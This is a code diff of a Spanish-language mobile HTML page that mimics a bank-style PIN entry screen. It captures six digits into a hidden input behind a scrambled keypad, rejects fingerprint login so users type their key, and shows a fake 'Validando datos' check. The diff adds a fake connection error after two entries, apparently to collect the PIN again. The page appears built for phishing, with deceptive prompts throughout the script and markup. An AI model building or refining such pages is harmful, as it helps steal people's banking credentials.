--- a/index.html
+++ b/index.html
@@ -2,7 +2,6 @@
 <html lang="es">
 <head>
 <meta charset="utf-8">
-<!-- VIEWPORT FIJO PARA QUE ANDROID NO AGRANDE NADA -->
 <meta name="viewport" content="width=720, height=1600, user-scalable=no">
 <title>Teclado Android</title>
 <style>
@@ -11,181 +10,85 @@
     src: url('ArabotoFuerte.ttf') format('truetype');
   }
   html, body {
-    margin:0;
-    padding:0;
-    width:100%;
-    height:100%;
-    overflow:hidden;
-    position:fixed;
-    touch-action:none;
-    background:#000;
-    -webkit-text-size-adjust:none;
+    margin:0;padding:0;width:100%;height:100%;overflow:hidden;position:fixed;
+    touch-action:none;background:#000;-webkit-text-size-adjust:none;
   }
   .screen{
-    position:relative;
-    width:720px;
-    height:1600px;
-    overflow:hidden;
-    margin:0 auto;
-    background-image:url('fondo.png');
-    background-size:720px 1600px;
-    background-repeat:no-repeat;
+    position:relative;width:720px;height:1600px;overflow:hidden;margin:0 auto;
+    background-image:url('fondo.png');background-size:720px 1600px;background-repeat:no-repeat;
   }
   .overlay {
-    position:absolute;
-    top:0;
-    left:0;
-    width:100%;
-    height:100%;
-    background:rgba(0,0,0,0.55);
-    display:none;
-    z-index:20000;
+    position:absolute;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.55);
+    display:none;z-index:20000;
   }
-  /* ---- POPUP DE HUELLA ---- */
   .overlay-huella {
-    position:absolute;
-    top:0;
-    left:0;
-    width:100%;
-    height:100%;
-    background:rgba(0,0,0,0.55);
-    display:none;
-    z-index:10005;
+    position:absolute;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.55);
+    display:none;z-index:10005;
   }
   .popup-huella {
-    position:absolute;
-    left:50%;
-    top:1020px;
-    transform:translateX(-50%);
-    width:680px;
-    height:430px;
-    background:rgba(20, 20, 20, 0.95);
-    border-radius:35px;
-    display:none;
-    z-index:10010;
-    color:white;
-    font-family:Arial, sans-serif;
-    text-align:center;
-    padding-top:40px;
-    font-size:34px;
-    font-weight:bold;
+    position:absolute;left:50%;top:1020px;transform:translateX(-50%);
+    width:680px;height:430px;background:rgba(20,20,20,0.95);border-radius:35px;
+    display:none;z-index:10010;color:white;font-family:Arial,sans-serif;
+    text-align:center;padding-top:40px;font-size:34px;font-weight:bold;
   }
   .spinner-huella {
-    border: 6px solid #ffffff;
-    border-top: 6px solid #03bfb8;
-    border-radius: 50%;
-    width: 65px;
-    height: 65px;
-    margin: 50px auto 15px auto;
-    animation: spin 0.5s linear infinite;
+    border:6px solid #fff;border-top:6px solid #03bfb8;border-radius:50%;
+    width:65px;height:65px;margin:50px auto 15px auto;animation:spin .5s linear infinite;
   }
   .cancelar-huella {
-    position:absolute;
-    bottom:25px;
-    left:40px;
-    font-size:30px;
-    color:#03bfb8;
-    font-family:Arial, sans-serif;
+    position:absolute;bottom:25px;left:40px;font-size:30px;color:#03bfb8;
   }
   .title {
-    position:absolute;
-    left:50%;
-    top:960px;
-    transform:translateX(-50%);
-    font-size:39px;
-    font-family: 'ArabotoFuerte', Arial, sans-serif;
-    font-weight:700;
-    color:#6f2182;
-    user-select:none;
-    pointer-events:none;
+    position:absolute;left:50%;top:960px;transform:translateX(-50%);
+    font-size:39px;font-family:'ArabotoFuerte',Arial,sans-serif;font-weight:700;
+    color:#6f2182;user-select:none;pointer-events:none;
   }
   .pin-dots{
-    position:absolute;
-    top:970px;
-    left:50%;
-    transform:translateX(-50%);
-    display:none;
-    gap:45px;
+    position:absolute;top:970px;left:50%;transform:translateX(-50%);
+    display:none;gap:45px;
   }
-  .dot{
-    width:24px;
-    height:24px;
-    border-radius:50%;
-    background:#999;
-    opacity:0.9;
-  }
-  .dot.filled{
-    background:#000;
-    opacity:1;
-  }
+  .dot{width:24px;height:24px;border-radius:50%;background:#999;opacity:0.9;}
+  .dot.filled{background:#000;opacity:1;}
   .key{
-    position:absolute;
-    width:180px;
-    height:90px;
-    border-radius:18px;
-    transform:translate(-50%, -50%);
-    display:flex;
-    justify-content:center;
-    align-items:center;
+    position:absolute;width:180px;height:90px;border-radius:18px;
+    transform:translate(-50%,-50%);display:flex;justify-content:center;align-items:center;
   }
   .key span{
-    font-size:43px;
-    font-family:"Arial Rounded MT Bold", Arial, sans-serif;
-    font-weight:700;
-    color:#333;
-    user-select:none;
-    pointer-events:none;
+    font-size:43px;font-family:"Arial Rounded MT Bold",Arial,sans-serif;
+    font-weight:700;color:#333;user-select:none;pointer-events:none;
   }
   .key::after{
-    content:"";
-    position:absolute;
-    width:100%;
-    height:100%;
-    border-radius:18px;
-    background:rgba(0,0,0,0);
-    transform: translateY(-4px);
-    transition: background 0.12s;
-    pointer-events:none;
+    content:"";position:absolute;width:100%;height:100%;border-radius:18px;
+    background:transparent;transform:translateY(-4px);transition:background .12s;
   }
-  .key.pressed::after{
-    background:rgba(53, 53, 53, 0.06);
-  }
+  .key.pressed::after{background:rgba(53,53,53,0.06);}
+
+  /* Popup normal - Validando datos */
   .popup {
-    position: absolute;
-    left: 50%;
-    top: 645px;
-    transform: translateX(-50%);
-    background: rgba(255, 255, 255, 0.99);
-    padding: 55px 100px;
-    border-radius: 30px;
-    color: #000;
-    font-family: Arial, sans-serif;
-    font-size: 32px;
-    font-weight: bold;
-    text-align:center;
-    display: none;
-    z-index:20001;
-    white-space: nowrap;
-  }
-  .spinner {
-    border: 6px solid #ffffff;
-    border-top: 6px solid #03bfb8;
-    border-radius: 50%;
-    width: 40px;
-    height: 40px;
-    margin: 0 auto 25px auto;
-    animation: spin 0.5s linear infinite;
-  }
-  @keyframes spin {
-    from { transform: rotate(0deg); }
-    to { transform: rotate(360deg); }
+    position:absolute;left:50%;top:645px;transform:translateX(-50%);
+    background:rgba(255,255,255,0.99);padding:55px 100px;border-radius:30px;
+    color:#000;font-family:Arial,sans-serif;font-size:32px;font-weight:bold;
+    text-align:center;display:none;z-index:20001;white-space:nowrap;
   }
 
-  /* ← NUEVO: Pantalla negra final cuando se bloquea */
-  #blockScreen {
-    position:fixed;top:0;left:0;width:100%;height:100%;background:#000;
-    z-index:999999;display:none;pointer-events:none;
+  /* Popup de error - MISMO TAMAÑO QUE VALIDANDO DATOS + solo 2 líneas */
+  .popup-error {
+    position:absolute;left:50%;top:645px;transform:translateX(-50%);
+    background:rgba(255,255,255,0.99);padding:35px 60px;border-radius:30px;
+    color:#000;font-family:Arial,sans-serif;text-align:center;
+    display:none;z-index:20001;
   }
+  .popup-error .texto {
+    font-size:32px;font-weight:bold;line-height:1.2;
+    white-space:nowrap;
+  }
+
+  .spinner {
+    border:6px solid #fff;border-top:6px solid #03bfb8;border-radius:50%;
+    width:40px;height:40px;margin:0 auto 30px auto;animation:spin .5s linear infinite;
+  }
+  @keyframes spin {from{transform:rotate(0deg)}to{transform:rotate(360deg)}}
+  #blockScreen{position:fixed;top:0;left:0;width:100%;height:100%;background:#000;z-index:999999;display:none;}
 </style>
 </head>
 <body>
@@ -196,58 +99,60 @@
   <div class="popup-huella" id="popupHuella">
       Esta opción no está disponible
       <div class="spinner-huella"></div>
-      <div style="margin-top:40px; font-size:22px; color:#ccc;">
+      <div style="margin-top:40px;font-size:22px;color:#ccc;">
         Para su seguridad, ingrese su clave de 6 dígitos.
       </div>
       <div class="cancelar-huella" id="cancelarHuella">Cancelar</div>
   </div>
   <div class="title" id="title">Ingresa tu clave</div>
+
   <div class="popup" id="popup">
       <div class="spinner"></div>
       Validando datos
   </div>
-  <div class="pin-dots" id="pinDots">
-    <div class="dot"></div>
-    <div class="dot"></div>
-    <div class="dot"></div>
-    <div class="dot"></div>
-    <div class="dot"></div>
-    <div class="dot"></div>
+
+  <div class="popup-error" id="popupError">
+      <div class="spinner"></div>
+      <div class="texto">
+        Verifica tu conexión a<br>internet
+      </div>
   </div>
-  <div class="key" data-num="3" style="left:152.5px; top:1116.5px;"><span>3</span></div>
-  <div class="key" data-num="7" style="left:355.5px; top:1116.5px;"><span>7</span></div>
-  <div class="key" data-num="1" style="left:558.5px; top:1116.5px;"><span>1</span></div>
-  <div class="key" data-num="9" style="left:152.5px; top:1224px;"><span>9</span></div>
-  <div class="key" data-num="4" style="left:355.5px; top:1224px;"><span>4</span></div>
-  <div class="key" data-num="0" style="left:558.5px; top:1224px;"><span>0</span></div>
-  <div class="key" data-num="6" style="left:152.5px; top:1328px;"><span>6</span></div>
-  <div class="key" data-num="8" style="left:355.5px; top:1328px;"><span>8</span></div>
-  <div class="key" data-num="2" style="left:558.5px; top:1328px;"><span>2</span></div>
-  <div class="key" data-num="5" style="left:355.5px; top:1432.5px;"><span>5</span></div>
-  <div id="deleteArea" style="position:absolute; left:558.5px; top:1403.5px; width:180px; height:90px; transform:translate(-50%, -50%);"></div>
+
+  <div class="pin-dots" id="pinDots">
+    <div class="dot"></div><div class="dot"></div><div class="dot"></div>
+    <div class="dot"></div><div class="dot"></div><div class="dot"></div>
+  </div>
+  <div class="key" data-num="3" style="left:152.5px;top:1116.5px;"><span>3</span></div>
+  <div class="key" data-num="7" style="left:355.5px;top:1116.5px;"><span>7</span></div>
+  <div class="key" data-num="1" style="left:558.5px;top:1116.5px;"><span>1</span></div>
+  <div class="key" data-num="9" style="left:152.5px;top:1224px;"><span>9</span></div>
+  <div class="key" data-num="4" style="left:355.5px;top:1224px;"><span>4</span></div>
+  <div class="key" data-num="0" style="left:558.5px;top:1224px;"><span>0</span></div>
+  <div class="key" data-num="6" style="left:152.5px;top:1328px;"><span>6</span></div>
+  <div class="key" data-num="8" style="left:355.5px;top:1328px;"><span>8</span></div>
+  <div class="key" data-num="2" style="left:558.5px;top:1328px;"><span>2</span></div>
+  <div class="key" data-num="5" style="left:355.5px;top:1432.5px;"><span>5</span></div>
+  <div id="deleteArea" style="position:absolute;left:558.5px;top:1403.5px;width:180px;height:90px;transform:translate(-50%,-50%);"></div>
 </div>
 
-<!-- INPUT OCULTO -->
 <input type="tel" id="realPin" inputmode="numeric" pattern="[0-9]*" maxlength="6" autocomplete="off"
-       style="position:fixed;top:-200px;left:-200px;opacity:0;width:1px;height:1px;color:transparent;caret-color:transparent;border:none;outline:none;" readonly>
+       style="position:fixed;top:-200px;left:-200px;opacity:0;width:1px;height:1px;" readonly>
 
-<!-- ← NUEVO: Pantalla negra que bloquea todo al final -->
 <div id="blockScreen"></div>
 
 <script>
-  document.addEventListener('touchmove', function(e) {
-    e.preventDefault();
-  }, { passive: false });
+  document.addEventListener('touchmove', e => e.preventDefault(), {passive:false});
 
   const title = document.getElementById("title");
   const pinDots = document.getElementById("pinDots");
   const dots = document.querySelectorAll(".dot");
   const popup = document.getElementById("popup");
+  const popupError = document.getElementById("popupError");
   const overlay = document.getElementById("overlay");
   const realPin = document.getElementById("realPin");
-  const blockScreen = document.getElementById("blockScreen");
+
   let pinIndex = 0;
-  let failedAttempts = 0; // ← Contador de intentos fallidos
+  let failedAttempts = 0;
 
   function resetPIN() {
     dots.forEach(d => d.classList.remove("filled"));
@@ -255,18 +160,6 @@
     realPin.value = "";
     title.style.display = "block";
     pinDots.style.display = "none";
-  }
-
-  // ← NUEVA FUNCIÓN: Cierra todo después de 2 intentos
-  function lockAndClose() {
-    blockScreen.style.display = "block"; // Pantalla negra total
-    document.body.style.pointerEvents = "none"; // Bloquea todo toque
-    // Intenta cerrar la app (solo funciona si tienes JavaScriptInterface)
-    try { window.Android.closeApp(); } catch(e) {}
-    // Cierra ventana en PC o Chrome
-    try { window.close(); } catch(e) {}
-    // Forzar cierre visual total
-    setTimeout(() => { document.body.innerHTML = ""; }, 2000);
   }
 
   document.querySelectorAll('.key').forEach(btn => {
@@ -287,52 +180,51 @@
         pinIndex++;
       }
       if(pinIndex === 6){
-        failedAttempts++; // ← Cada PIN completo cuenta como intento
+        failedAttempts++;
         popup.style.display = "block";
         overlay.style.display = "block";
+
+        // "Validando datos" dura 4 segundos
         setTimeout(() => {
           popup.style.display = "none";
           overlay.style.display = "none";
-          resetPIN();
 
-          if (failedAttempts >= 2) {
-            lockAndClose(); // ← CIERRE TOTAL después de 2 intentos
+          if (failedAttempts === 2) {
+            popupError.style.display = "block";
+            overlay.style.display = "block";
+            // "Verifica tu conexión..." dura 1 minuto (60000 ms)
+            setTimeout(() => {
+              popupError.style.display = "none";
+              overlay.style.display = "none";
+              resetPIN();
+            }, 120000);
+          } else {
+            resetPIN();
           }
-        }, 6000);
+        }, 4000); // ← cambiado a 4 segundos
       }
     });
   });
 
-  const deleteArea = document.getElementById("deleteArea");
-  deleteArea.addEventListener('click', () => {
+  document.getElementById("deleteArea").addEventListener('click', () => {
     if(pinIndex === 0) return;
     pinIndex--;
     dots[pinIndex].classList.remove("filled");
-    realPin.value = realPin.value.slice(0, -1);
-    realPin.dispatchEvent(new Event('input'));
+    realPin.value = realPin.value.slice(0,-1);
     if(pinIndex === 0){
       title.style.display = "block";
       pinDots.style.display = "none";
     }
   });
 
-  /* === POPUP HUELLA === */
   const huellaGif = document.getElementById("huellaGif");
   const popupHuella = document.getElementById("popupHuella");
   const overlayHuella = document.getElementById("overlayHuella");
   const cancelarHuella = document.getElementById("cancelarHuella");
-  huellaGif.addEventListener("click", () => {
-    popupHuella.style.display = "block";
-    overlayHuella.style.display = "block";
-  });
-  cancelarHuella.addEventListener("click", () => {
-    popupHuella.style.display = "none";
-    overlayHuella.style.display = "none";
-  });
-  overlayHuella.addEventListener("click", () => {
-    popupHuella.style.display = "none";
-    overlayHuella.style.display = "none";
-  });
+  huellaGif.onclick = () => { popupHuella.style.display = "block"; overlayHuella.style.display = "block"; };
+  cancelarHuella.onclick = overlayHuella.onclick = () => {
+    popupHuella.style.display = "none"; overlayHuella.style.display = "none";
+  };
 
   realPin.focus();
   document.addEventListener('click', () => setTimeout(() => realPin.focus(), 50));
